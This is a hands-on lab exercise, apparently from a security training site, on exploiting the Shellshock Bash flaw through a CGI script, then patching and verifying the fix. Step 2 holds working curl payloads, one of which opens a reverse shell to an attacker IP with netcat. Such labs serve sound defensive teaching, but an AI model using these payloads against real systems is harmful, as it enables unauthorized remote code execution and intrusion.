Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 52: Exploiting a Web Server Vulnerability (Shellshock)

by | Jun 10, 2025 | 0 comments

Objective

Simulate an attack exploiting the Shellshock vulnerability (CVE-2014-6271) in web servers to gain unauthorized Remote Code Execution (RCE). Understand the importance of timely patching and implementing security measures to mitigate such vulnerabilities.

Scenario

The Shellshock vulnerability allows attackers to execute arbitrary commands on systems using vulnerable versions of the Bash shell. This vulnerability impacts web servers that pass user-supplied data to Bash, such as through CGI scripts. In this exercise, you’ll exploit a vulnerable web server, verify the attack by executing commands, and patch the system to eliminate the vulnerability.

⚠️ Important: This exercise must be conducted in a legal and controlled environment. Unauthorized exploitation of vulnerabilities is illegal and unethical.

Lab Instructions

Step 1: Set Up a Vulnerable Web Server

a. Install Apache with CGI Support

sudo apt update
sudo apt install apache2 apache2-utils -y
sudo a2enmod cgi
sudo systemctl restart apache2

b. Install a Vulnerable Version of Bash (For Lab Use Only)

  • Install an older Bash version manually or use a vulnerable VM.

c. Create a Vulnerable CGI Script

sudo nano /usr/lib/cgi-bin/vulnerable.sh
  • Add the following content:
#!/bin/bash
echo "Content-type: text/plain"
echo ""
echo "Vulnerable CGI Script"

d. Set Executable Permissions

sudo chmod +x /usr/lib/cgi-bin/vulnerable.sh

e. Verify the CGI Script is Accessible

  • Open a browser and navigate to:
http://<server-ip>/cgi-bin/vulnerable.sh
  • Expected Result: Displays “Vulnerable CGI Script.”

Step 2: Exploit the Shellshock Vulnerability

a. Craft and Send a Malicious HTTP Request

curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'whoami'" http://<server-ip>/cgi-bin/vulnerable.sh
  • Expected Result: The server responds with the user account running the script (e.g., www-data).

b. Gain Remote Shell Access

curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'nc -e /bin/bash <attacker-ip> 4444'" http://<server-ip>/cgi-bin/vulnerable.sh
  • Explanation: This command opens a reverse shell to the attacker.

c. Listen for the Reverse Shell on the Attacker Machine

nc -lvnp 4444
  • Expected Result: The attacker gains a shell on the target server.

Step 3: Verify Remote Code Execution

a. Execute Commands on the Server

whoami
uname -a
ls /var/www/html
  • Expected Result: Commands execute on the server, confirming RCE.

Step 4: Patch the Shellshock Vulnerability

a. Update Bash

sudo apt update
sudo apt install --only-upgrade bash

b. Verify the Patch

env x='() { :;}; echo Vulnerable' bash -c "echo This is a test"
  • Expected Result: No output from the injected command, indicating the system is patched.

Step 5: Test Exploit After Patching

  • Re-run the exploit command:
curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'whoami'" http://<server-ip>/cgi-bin/vulnerable.sh
  • Expected Result: The command fails, confirming the vulnerability has been patched.

Step 6: Discuss Mitigation Strategies

  1. Patch Management: Regularly update system packages, especially critical components like Bash.
  2. Restrict CGI Usage: Disable unnecessary CGI scripts on web servers.
  3. Web Application Firewalls (WAF): Implement WAFs to filter malicious requests.
  4. Least Privilege: Configure web services to run with minimal privileges.
  5. Network Segmentation: Isolate critical systems to limit exploit impact.

Solution & Explanation

How Shellshock Works

  • The vulnerability allows attackers to inject malicious commands into environment variables processed by Bash.
  • Web servers using CGI scripts are especially vulnerable.

Why Shellshock is Dangerous

  • Remote Code Execution (RCE): Attackers can execute arbitrary commands.
  • Privilege Escalation: Exploiting web services running with elevated privileges.
  • Network Propagation: Exploits can spread across networked systems.

Mitigation Techniques

  1. Apply Security Patches: Update Bash to secure versions.
  2. Limit CGI Use: Replace CGI with safer alternatives.
  3. Implement Security Controls: Use WAFs and IDS/IPS to block exploit attempts.

Testing & Verification

  • Before Patching: The exploit succeeds, leading to RCE.
  • After Patching: Exploitation attempts fail.

Confirm Bash Version

bash --version

Validate Patch Effectiveness

env x='() { :;}; echo Vulnerable' bash -c "echo Test"

Security Best Practices

  1. Patch Promptly: Apply updates regularly to critical software.
  2. Minimize Attack Surface: Disable unused services and features.
  3. Apply Principle of Least Privilege: Limit the permissions of web services.
  4. Network Monitoring: Detect and block suspicious behavior.
  5. Isolate Critical Systems: Use segmentation to protect sensitive assets.

Additional Script (Optional)

Automate Shellshock Patch Verification:

#!/bin/bash
# Check for Shellshock vulnerability
if env x='() { :;}; echo Vulnerable' bash -c "echo Test" | grep -q Vulnerable; then
  echo "System is VULNERABLE to Shellshock."
else
  echo "System is PATCHED against Shellshock."
fi

Run the script:

chmod +x check_shellshock.sh
./check_shellshock.sh

Conclusion

In this exercise, you exploited the Shellshock vulnerability on a web server, verified Remote Code Execution (RCE), and applied a security patch to eliminate the vulnerability. Regular patching, restricting CGI usage, and implementing security controls are critical measures to defend against similar attacks.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *